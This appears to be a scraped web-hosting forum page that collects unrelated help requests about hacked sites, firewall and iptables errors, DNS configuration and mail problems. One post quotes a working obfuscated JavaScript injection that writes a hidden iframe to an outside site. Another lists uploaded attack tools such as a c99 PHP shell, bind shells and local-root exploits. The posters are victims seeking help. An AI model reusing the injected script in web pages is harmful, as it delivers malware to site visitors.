Unknown Script/hacked Site
Mar 10, 2008For a bit now, my site has been having probems with a script constantly being added to my index.php and header.php files, despite how many times I remove it.
The script looks like this:  ....
For a bit now, my site has been having probems with a script constantly being added to my index.php and header.php files, despite how many times I remove it.
The script looks like this:  ....
A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?
View 6 Replies View RelatedOne of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.
Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.
I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.
My site keeps going down every 10 minutes. It'll be online for 10 minutes, than down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself site keeps crashing!
And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.
        
Quote:
<script type="text/javascript" src="swfobject.js"></script>
    
<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11  4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11  4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3  9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,  50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,  39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,  52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>
What the heck is going on?
I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... can not and it shows homepage like this:
[url]
What is the best way to clean a hacked site?
All of the pages have iframe injection and my only backup was made after the attack.
I have hundreds of pages, do I have to edit them all manually?
The database has been changed. Some of the data has been altered
The tilte has been change to: Hacked By Genc_Rapci
I have set up my Virtual Private Server and uploaded all my site's files to /var/www folder. Before that, there was an old simple 'index.html' file
Code:
<html>
<head>
<title>INDEX</title>
</head>
<body>
<h1>IT WORKS!!!!</h1>
</body>
</html>
and when I typed the address www.mydomain.com it displayed correctly. Then I deleted this html and uploaded my files through FTP and now the browser says :
Code:
Warning: Unknown: failed to open stream: Permission denied in Unknown on line 0
Fatal error: Unknown: Failed opening required '/var/www/index.php' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0
Shell uploaded - Site hacked - How to trace?
Many of my customers let me know that their websites had been hacked. I think it comes from local hacker ....
First of all, I discoverd this forum during my quest to unravel the mysteries of how my site was hacked. I hope this is an appropriate forum to discuss the issues even though I am not a web hosting provider, but  merely a customer of a web hosting company, hostrocket.com
I have an installation of WordPress 2.1 WordPress creates a couple world writable directories such as Uploads and Cache which are owned by nobody. Apparently (according to the tech support at hostrocket.com) someone was able to insert and exectue a php script in my world writable Uploads directory. Over 40MB of scripts, executables and files were uploaded. As best I can tell, my space was being used as some sort of link farm or perhaps acting as a server in my webspace. I do  not have much knowledge about these things and consequently can't talk very inetlligently about them. But I am trying to grasp what little I am able to absorb about how this could have happened, what I can do to mitigate it from reocurring in the future.
Some of the stuff that was in the directory is as follows...
2421            
bindz           
h4ckerz         
mass.pl         p
trace-kmod
2421.1          
brk             
help.php        
mybindshell     
ptrace24
99.php          
coredump        
idf.php         
netcat          
pwned
CMD.php         
dc.pl           
index.html      
online          
r0nin
TMT.htm         
elfdump         
kmod2           
online.tar.gz   
raptor
TTdummyfile     
gcc             
krad3           
prctl2          
uselib24
bind.pl         g
cc.1           
list.txt        
ptrace
The "online" directory contained over 40MB of directories such as...
abortion                        diethylpropion
accounting                      diflucan
accupril                        diovan
acne                            distance-education
actonel                         dospan
actos                           dovonex
acyclovir                       doxycycline
adderall                        drug
adipex                          drug-rehab
adventure-travel                drug-test
adware                          dvd
adware-spyware                  e-pathto
affiliate-program               effexor
air-travel                      elavil
aldara                          enalapril
alprazolam                      equity-loan
altace                          estradiol
amaryl                          evista
ambien                          fioricet
amitriptyline                   flexeril
amoxicillin                     flonase
amoxil                          florida-lottery
antivirus                       fluoxetine
atenolol                        fosamax
ativan                          free-poker
avandia                         free-slots
avapro                          free-spyware
baclofen                        furniture
bankruptcy                      gambling
bextra                          home-equity-loan
biaxin                          home-loan
bingo                           hosting
black-jack                      hotel
blackjack                       hydrocodone
blackjack-game                  images
bontril                         imitrex
britney-spears                  insurance-life
business                        internet-betting
buspar                          internet-gambling
buspirone                       loan
butalbital                      loans
buy-hardware                    lortab
buy-phentermine                 lottery
california-lottery              lotto
captopril                       mesothelioma
car                             mortgages
car-insurance                   online-black-jack
carisoprodol                    online-casino
cars                            online-gambling
cartia                          online-loan
cash-loan                       online-pharmacy
casino                          online-poker
casino-games                    online-roulette
casino-las-vegas                online-slot
celebrex                        payday-advances
celebrex-online                 phentermine
celexa                          poker
celexa-online                   poker-chips
cephalexin                      poker-game
cialis                          poker-tables
cigarette                       refinance
cigarettes                      refinance-house
cipro                           refinance-loan
claritin                        refinancing
clindamycin                     ringtones
clonazepam                      roulette
clonidine                       slot-machine
codeine                         slot-machines
consolidate-card                slots
cozaar                          steroids
credit                          structured-settlement
credit-card                     texas-holdem
credit-card-debt                texas-holdem-poker
credit-card-debt-consolidation  texas-holdem-rules
creditcard                      texas-lottery
cyclobenzaprine                 tramadol
darvocet                        travel
dating                          travel-insurance
debt-consolidation              ultram
debtcard                        valium
denavir                         viagra
diazepam                        vicodin
diclofenac                      video-poker
didrex                          wagering
diet-pills                      xanax
As you can see, I was had in a BIG way.
So the first thing my webhost had me do was to change ownership of the directories owned by nobody to me. Then I was able to change permissions from 777 to 755. However in so doing, I am no longer able to use the Dashboard of WordPress to upload images anymore, unless I temporarily change permissions back to 777.
The other thing the tech support guy did is to create an .htaccess file with,
php_flag engine off
I guess this basically renders php scripts impotent from running.
So without flaming me, can you help me understand how someone in a shared server environment is able to put a php script into one of my directories?
What amazed me was this particular script, "99.php" actually when viewed in a browser window titled phpshell was called "c99adult v. 1.0 pre-release build #16". It basically enabled whoever had access to the URL, to view my webspace, and do all sorts of nasty things. Talk about a wake-up call!
Obviously this enabled the hacker to view my config.php file and ascertain my database password and everything else. Whether  he did, or whether there is a logfile of that info that could enable him to hack the database at some time in the future is unknown to me but it's really freaking me out.
I host a website on a windows server
and once in a while, i check all the root folders to find a folder that holds 40GB of folder in a folder in a folder... (i never get to the actual files)
Is there a way to prevent this?
I was reviewing my cPanel awStats today.
The brower stats looked something like this:   Firefox    42.9 %
  MS Internet Explorer 21 %
  Mozilla 17.3 %
  Unknown 5.8 %
  K-Meleon 5.4 %
  Safari 3.7 %
    Opera 3.1 %
    Netscape 0.1 %
    BonEcho (Firefox 2.0 development) 0.1 %
Anyone care to venture a guess as to what the 'unknown' browsers might be?
The thing is that my sysadmin told me that he get filesize and eta when downloading a file from my server while all of my user and myself get unknown flesize and no eta. got Web Server apache2handler centos 5.1 64bit
View 1 Replies View RelatedI have something weird going on with CSF on a new server. When starting the firewall I get this:
Quote:
lushing chain `INPUT'
Flushing chain `FORWARD'
Flushing chain `OUTPUT'
Restarting bandmin acctboth chains for cPanel
ACCEPT  all opt -- in lo out *  0.0.0.0/0  -> 0.0.0.0/0  
ACCEPT  all opt -- in * out lo  0.0.0.0/0  -> 0.0.0.0/0  
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
LOG  tcp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_IN Blocked* ' 
LOG  tcp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_OUT Blocked* ' 
LOG  udp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_IN Blocked* ' 
LOG  udp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_OUT Blocked* ' 
LOG  icmp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_IN Blocked* ' 
LOG  icmp opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_OUT Blocked* ' 
LOG  all opt -- in * out *  0.0.0.0/0  -> 0.0.0.0/0  limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *BLOCK_LIST* ' 
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
INVDROP  all opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  state INVALID 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x3F/0x00 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x3F/0x3F 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x03/0x03 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x06/0x06 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x05/0x05 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x11/0x01 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x18/0x08 
INVDROP  tcp opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x30/0x20 
INVDROP  all opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  state INVALID 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x3F/0x00 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x3F/0x3F 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x03/0x03 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x06/0x06 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x05/0x05 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x11/0x01 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x18/0x08 
INVDROP  tcp opt -- in * out eth+  0.0.0.0/0  -> 0.0.0.0/0  tcp flags:0x30/0x20 
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
LOGDROPIN  all opt -- in eth+ out *  64.58.165.126  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 64.58.165.126  
LOGDROPIN  all opt -- in eth+ out *  216.105.216.5  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 216.105.216.5  
LOGDROPIN  all opt -- in eth+ out *  64.251.10.133  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 64.251.10.133  
LOGDROPIN  all opt -- in eth+ out *  89.149.240.26  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 89.149.240.26  
LOGDROPIN  all opt -- in eth+ out *  195.87.225.72  -> 0.0.0.0/0  
LOGDROPOUT  all opt -- in * out eth+  0.0.0.0/0  -> 195.87.225.72  
BLOCKDROP  ...
... 
SPAMHAUS  all opt -- in eth+ out *  0.0.0.0/0  -> 0.0.0.0/0  
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
Flushing chain `INPUT'
Flushing chain `FORWARD'
Flushing chain `OUTPUT'
Flushing chain `BLOCKDROP'
Flushing chain `DSHIELD'
Flushing chain `INVDROP'
Flushing chain `LOGDROPIN'
Flushing chain `LOGDROPOUT'
Flushing chain `SPAMHAUS'
Flushing chain `acctboth'
Deleting chain `BLOCKDROP'
Deleting chain `DSHIELD'
Deleting chain `INVDROP'
Deleting chain `LOGDROPIN'
Deleting chain `LOGDROPOUT'
Deleting chain `SPAMHAUS'
Deleting chain `acctboth'
Error: iptables command [/sbin/iptables -v -I OUTPUT -p tcp --dport 25 -j ] failed, at line 544
Unknown arg `-j' ? I've been Google'ing, searched WHT and the CSF forums but can't find a solution...
I've bought a basic unmanaged VPS, purely to learn things from it. The best way to learn imo is to hammer the hell out of things, break it, then try to fix it. Anyway, I think I'm part way there, pretty sure I've broken something 
When I start the consoleSSH I get this at the top:
Warning: Unknown iptable module: xt_NFQUEUE, skipped
Warning: Unknown iptable module: xt_mark"IPTABLES="ipt_REJECT, skipped
Warning: Unknown iptable module: xt_NFQUEUE, skipped
Warning: Unknown iptable module: xt_mark"IPTABLES="ipt_REJECT, skipped
Warning: Unknown iptable module: xt_NFQUEUE, skipped
Warning: Unknown iptable module: xt_mark, skipped
Any ideas what's causing it and how I can fix it? ..............
When I am sending mails through my Outlook, the mails are being delivered with an unknown signature as below:
ADVERTISING
--------------------------------------------
<a href=[url]
Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>
from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>
flawless customer support. New discounts and special offers !       <br>
</a>
[url]
--------------------------------------------
Eventhough, I did not setup any signatures. Plesk server with spamguardian running.
my friend has an un-managed VPS plan in kloxo-hypervm mode
yesterday the stats showed in hypervm as the space was over used, so I personally deleted the processed stats which cleared around 20gb space, again today the space is totally consumed, I don't know why its happening and have no clue where are the other locations where the space could have been consumed i.e similar to location of logs or any other specs which could have been consuming space
unknown space consumption - very high no idea how!
its actually an image hosting site and I noted that not many pics and not much space was consumed in the pics uploaded in the last 24hrs but this really puzzles and troubles me as I am currently tracking my friend's VPS, please help me sort this out problem and keep my head high before my friend
I have just taken hosting from godaddy. i have taken dedicated website hosting. But my ftp are working in my office filezilla and not at home. Its giving 530 error, unknown ip address. 
I am using file zilla in office and at home.
i think it's an apache problem, but whenever i download something from my server via http, i get unknown file size when downloading. it's not a big problem, but it's kind of annoying.
does anyone know why it's doing this?
When I install APF 0.9.6 firewall on redhat enterprise linux 5 I get the following error
Starting APF:iptables v1.3.5: Unknown arg `--set-tos'
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.3.5: Unknown arg `--set-tos'
Try `iptables -h' or 'iptables --help' for more information.
[  OK  ]
I'm using the same settings I've been using for years with no errors on RHEL3, but RHEL5 is new to me.
Anyone else run into this issue with APF firewall and RHEL5?
i did upgrade my kernel to 
2.6.18-164.2.1.el5 #1 SMP Wed Sep 30 12:55:19 EDT 2009 i686 i686 i386 GNU/Linux
and after reboot the server when i restart the firewall iptables give me this error
iptables: Unknown error 4294967295 ....
I have recently configured my nodes IPTables but its now throwing out the following error: iptables: Unknown error 4294967295
I have followed the instructions here http://kb.swsoft.com/article_130_875_en.html
Node software: CentOS and HyperVM/OpenVZ
Lately our VPS has needed to be restarted frequently (1-2x daily for the past 5 or so days).
I have pulled our eror_log file and pasted below the last several days.  I am hoping someone can take a look at it and point me in the right direction.
Because of limitations, I cannot post anything with urls, but the two errors that have been occuring most frequently are below
Code:
[Mon Mar  3 07:37:22 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:37:32 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:37:42 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:37:52 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:38:02 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar  3 07:38:12 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Wed Mar  5 07:44:02 2008] [error] Bad pid (15524) in scoreboard slot 44
[Wed Mar  5 07:44:02 2008] [error] Bad pid (3750) in scoreboard slot 46
[Wed Mar  5 07:44:02 2008] [error] Bad pid (3751) in scoreboard slot 47
2008-12-22 14:11:11.404 [INFO] [HTAccess] Updating configuration from [/home/xxxxx/public_html/dir/.htaccess]
2008-12-22 14:11:17.892 [INFO] [HTAccess] Updating configuration from [/home/xxxxxx/public_html/dir/.htaccess]
2008-12-22 14:11:18.973 [INFO] [HTAccess] Updating configuration from [/home/xxxxxx/public_html/.htaccess]
2008-12-22 14:11:18.973 [INFO] [HTAccess] Updating configuration from [/home/xxxxxxx/public_html/dir/.htaccess]
2008-12-22 14:11:21.587 [INFO] [HTAccess] Updating configuration from [/home/xxxxxxx/public_html/.htaccess]
2008-12-22 14:11:21.587 [INFO] [HTAccess] Updating configuration from [/home/xxxxxxx/public_html/dir/.htaccess]
2008-12-22 14:11:40.401 [INFO] [HTAccess] Updating configuration from [/home/xxxxxx/public_html/dir/.htaccess]
I always see those messages in my error log across all my domains on the servers.  
I came across a problematic situation today. Our client pmb.com.my has complained that their domain, when accessed from search engines will go to another site, not theirs. So, perhaps you guys can try this out.
1. Type the URL on the browser directly: [url]
You'll get the real site.
2. Try searching for "pmb malaysia" on Google:
[url]
3. You should see a normal listing for the site as the 1st result. Try clicking that link.
4. In our checks, it will go to a landing page (black bankground), and will redirect to an adult site.
5. You get this landing page too when you click the link to the site in step 1.
Appreciate if more people can try this out and post your findings here. I've contacted the RZ (site hosted there), and they said it is an issue with Google's cache. Not sure I buy that. 
I have the following problem:
When i try to restart the nameserver service i get the following error:
# service named restart
Stopping named:                                            [  OK  ]
Starting named:
Error in named configuration:
/etc/named.conf:87: unknown option 'e'
/etc/named.conf:120: unexpected end of input
                                                           [FAILED]
my named.conf as follows:
include "/etc/rndc.key";
controls {
        inet 127.0.0.1 allow { localhost; } keys { "rndc-key"; };
};
options {
    /* make named use port 53 for the source of all queries, to allow
         * firewalls to block all ports except 53:
         */
    query-source    port 53;
    // Put files that named is allowed to write in the data/ directory:
    directory "/var/named"; // the default
    dump-file             "data/cache_dump.db";
    statistics-file     "data/named_stats.txt";
   /* memstatistics-file     "data/named_mem_stats.txt"; */
};
logging {
/*      If you want to enable debugging, eg. using the 'rndc trace' command,
 *      named will try to write the 'named.run' file in the $directory (/var/named).
 *      By default, SELinux policy does not allow named to modify the /var/named directory,
 *      so put the default debug log file in data/ :
 */
    channel default_debug {
            file "data/named.run";
            severity dynamic;
    };
};
// All BIND 9 zones are in a "view", which allow different zones to be served
// to different types of client addresses, and for options to be set for groups
// of zones.
//
// By default, if named.conf contains no "view" clauses, all zones are in the
// "default" view, which matches all clients.
//
// If named.conf contains any "view" clause, then all zones MUST be in a view;
// so it is recommended to start off using views to avoid having to restructure
// your configuration files in the future.
view "localhost_resolver" {
/* This view sets up named to be a localhost resolver ( caching only nameserver ).
 * If all you want is a caching-only nameserver, then you need only define this view:
 */
    match-clients         { 127.0.0.0/24; };
    match-destinations    { localhost; };
    recursion yes;
    zone "." IN {
        type hint;
        file "/var/named/named.ca";
};
    // include "/var/named/named.rfc1912.zones";
    // you should not serve your rfc1912 names to non-localhost clients.
    // These are your "authoritativ
zone "smpl.splinteredmedia.net" {
        type master;
        file "/var/named/smpl.splinteredmedia.net.db";
};
e" internal zones, and would probably
    // also be included in the "localhost_resolver" view above :
};
view    "external" {
/* This view will contain zones you want to serve only to "external" clients
 * that have addresses that are not on your directly attached LAN interface subnets:
 */
    recursion no;
    // you'd probably want to deny recursion to external clients, so you don't
    // end up providing free DNS service to all takers
    // all views must contain the root hints zone:
    zone "." IN {
        type hint;
        file "/var/named/named.ca";
    };
    // These are your "authoritative" external zones, and would probably
    // contain entries for just your web and mail servers:
    // BEGIN external zone entries
};
z
zone "smpl.splinteredmedia.net" {
        type master;
        file "/var/named/smpl.splinteredmedia.net.db";
};
I have cPanel installed on a CentOS 5.1 VPS
Iptables have problem on all vps. when we started csf firewall, we have got this error on all vps:
iptables: Unknown error 18446744073709551615
and then iptables blocked all connection. i know that error is for
xt_tcpudp module. please tell me how to load this module on all vps?
also i have a full access to node server.
OS Version: CentOS 5.2
IPtables Version: iptables v1.3.5
Kernel: 2.6.18-028stab053.17 #1 SMP Mon Jun 9 20:42:43 MSD 2008 x86_64 x86_64 x86_64 GNU/Linux
while i am restoring db following error occured 
Code:
                              
Error at the line 6803: /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
Query: /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
MySQL: Unknown or incorrect time zone: 'NULL'
One of my clients has 2 accounts:
- foo.com, with a mail account info@foo.com.
- bar.com, with domain forwarding to foo.com.
Sending an email message to info@foo.com works.
Sending an email message to info@bar.com doesn't work. When using the ZoneEdit SMTP test utility I get the following error message:
Code:
> RCPT TO:<info@bar.com>
< 550 5.1.1 User unknown: info@bar.com
I checked "/etc/vdomainaliases/bar.com" and "/etc/localdomains", they are configured properly.
Any suggestions?
After the cPanel Update i'm getting this error: Unknown License File Version
In SSH i run this command:
Quote:
/usr/local/cpanel/cpkeyclt
and i get this error:
Quote:
Can't connect to cpanel key server: timeout.
Any other method to Update the License File?